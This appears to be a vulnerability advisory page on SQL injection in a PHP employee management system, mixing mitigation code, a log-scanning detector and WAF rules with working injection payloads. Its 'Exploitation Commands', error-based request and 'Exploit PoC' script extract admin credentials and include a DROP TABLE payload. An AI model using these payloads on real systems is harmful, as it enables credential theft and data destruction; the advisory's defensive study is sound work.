SourceCodester Best Employee Management System 1.0, SQL Injection, CVE-2025-2046 (Critical)

How CVE-2025-2046 Works

This vulnerability stems from missing input sanitization in the `/admin/print1.php` file of SourceCodester Best Employee Management System 1.0. The `id` parameter is concatenated directly into a SQL query without validation, so an attacker can supply SQL of their own instead of a numeric identifier. Remote attackers can manipulate this parameter to execute arbitrary database operations, such as extracting sensitive data, modifying records, or gaining administrative access. The flaw is classified as critical because of its potential for unauthorized data access and system compromise.

DailyCVE Form

Platform: SourceCodester BEMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025

What Undercode Say:

Exploitation Commands

curl -X GET "http://target.com/admin/print1.php?id=1' UNION SELECT 1,2,3,4,5-- -"
1' OR 1=1; DROP TABLE users;--

Detection Script

import requests

url = "http://target.com/admin/print1.php"
# Send the test value as the id parameter and look for a database error in the reply
payload = "1' AND 1=CONVERT(int,@@version)--"
response = requests.get(url, params={"id": payload}, timeout=10)
if "SQL" in response.text:
    print("Vulnerable to CVE-2025-2046")

Mitigation Steps

1. Apply vendor patches immediately.

2. Use prepared statements:

$stmt = $conn->prepare("SELECT * FROM employees WHERE id = ?");
$stmt->bind_param("i", $id);   // "i" binds $id as an integer, so it can never become SQL syntax
$stmt->execute();

3. Implement WAF rules to block SQLi patterns.

4. Restrict database user permissions.
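
To show why step 2 matters, the following is an added illustration written for this page in Python with SQLite, not code from the Best Employee Management System (which is PHP/MySQL). The table, column names and rows are constructed. The first lookup splices the raw parameter into the query text, as the vulnerable `print1.php` does; the second checks that the value is an integer and binds it as a query parameter, so a non-numeric `id` can never reach the SQL engine.

```python
import sqlite3

# Constructed sample data standing in for the application's employee table.
SAMPLE_ROWS = [
    (1, "alice", "HR"),
    (2, "bob", "Engineering"),
    (3, "carol", "Finance"),
]


def make_db():
    """Create an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT, dept TEXT)"
    )
    conn.executemany("INSERT INTO employees VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the flaw: the raw request value becomes part of the SQL text."""
    query = f"SELECT id, name, dept FROM employees WHERE id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Hardened lookup: type-check the value, then bind it as a parameter."""
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        return []  # reject anything that is not a plain integer
    # The driver sends the value separately from the statement, so it is data, never syntax.
    return conn.execute(
        "SELECT id, name, dept FROM employees WHERE id = ?", (numeric_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "1' OR '1'='1"
    print("vulnerable, id=2         ->", lookup_vulnerable(db, "2"))
    print("vulnerable, tautology    ->", lookup_vulnerable(db, tautology))
    print("safe, id=2               ->", lookup_safe(db, "2"))
    print("safe, tautology          ->", lookup_safe(db, tautology))
```

With a legitimate `id` both functions return one row; with the classic tautology the vulnerable version returns every employee while the hardened version returns nothing, which is the whole point of the prepared statement in step 2.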

Log Analysis Query

SELECT * FROM apache_logs WHERE request LIKE '%print1.php?id=%\%27\%20OR\%20%';

The backslash marks the literal % of the URL encoding so it is not read as a LIKE wildcard (MySQL's default escape character).
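
A single LIKE pattern only catches one payload shape. The script below is an added example for this page (not from the vendor or the advisory author) that reads Apache combined-format log lines, decodes the query string, and flags every request to `/admin/print1.php` whose `id` is not a plain integer, classifying it as an injection attempt when typical SQL tokens appear. The log lines and IP addresses are constructed samples; the path `/admin/print1.php` comes from the advisory.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format log lines; the addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Apr/2025:10:01:12 +0000] "GET /admin/print1.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [30/Apr/2025:10:01:13 +0000] "GET /admin/index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [30/Apr/2025:10:02:45 +0000] "GET /admin/print1.php?id=1%27%20OR%201%3D1--%20- HTTP/1.1" 200 40960 "-" "curl/8.4.0"
198.51.100.23 - - [30/Apr/2025:10:02:47 +0000] "GET /admin/print1.php?id=1%27%20UNION%20SELECT%201,2,3,4,5--%20- HTTP/1.1" 500 221 "-" "curl/8.4.0"
192.0.2.9 - - [30/Apr/2025:10:03:01 +0000] "GET /admin/print1.php?id=abc HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Fields of a combined-format entry up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Tokens that have no business inside a numeric identifier.
SQLI_RE = re.compile(
    r"('|--|/\*|\bor\b|\bunion\b|\bselect\b|\bsleep\b|\bbenchmark\b)", re.IGNORECASE
)

VULNERABLE_PATH = "/admin/print1.php"  # from the advisory


def classify_id(value):
    """Return 'ok' for a plain integer, 'sqli' when injection tokens appear, else 'anomalous'."""
    # parse_qs already decodes once; decoding again also catches double-encoded payloads.
    decoded = unquote_plus(value)
    if re.fullmatch(r"\d+", decoded):
        return "ok"
    if SQLI_RE.search(decoded):
        return "sqli"
    return "anomalous"


def scan_log(text):
    """Return one finding per request to the vulnerable script whose id is not a plain integer."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if parts.path != VULNERABLE_PATH:
            continue
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append({
                    "ip": match.group("ip"),
                    "time": match.group("ts"),
                    "status": match.group("status"),
                    "id": unquote_plus(value),
                    "verdict": verdict,
                })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['verdict']:9} status={finding['status']} id={finding['id']!r}")
```

Point `scan_log` at the contents of the real access log and review the `anomalous` hits by hand; the `sqli` hits are the ones worth correlating with the HTTP 500 responses and the source address, and a plain-integer allow-list like this one is far harder to evade than a keyword blocklist on its own.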

Nmap Detection

nmap -p80 --script http-sql-injection target.com

Exploit PoC

import requests
target = "http://victim.com/admin/print1.php"
injection = "1' UNION SELECT username,password,NULL,NULL,NULL FROM admins--"
response = requests.get(target, params={"id": injection})
print(response.text)

Protection Rules (ModSecurity)

SecRule ARGS:id "@detectSQLi" "id:1001,phase:2,deny,status:403,msg:'SQL injection attempt in id parameter'"

Database Hardening

REVOKE ALL PRIVILEGES ON *.* FROM 'app_user'@'%';
GRANT SELECT ON bems.* TO 'app_user'@'localhost';

Note that 'app_user'@'%' and 'app_user'@'localhost' are separate MySQL accounts; apply the REVOKE to whichever host pattern the application actually connects with.

Error-Based Detection

GET /admin/print1.php?id=1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3a,(SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- HTTP/1.1

Automated Patch Verification

grep -r "mysql_query" /var/www/html/

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
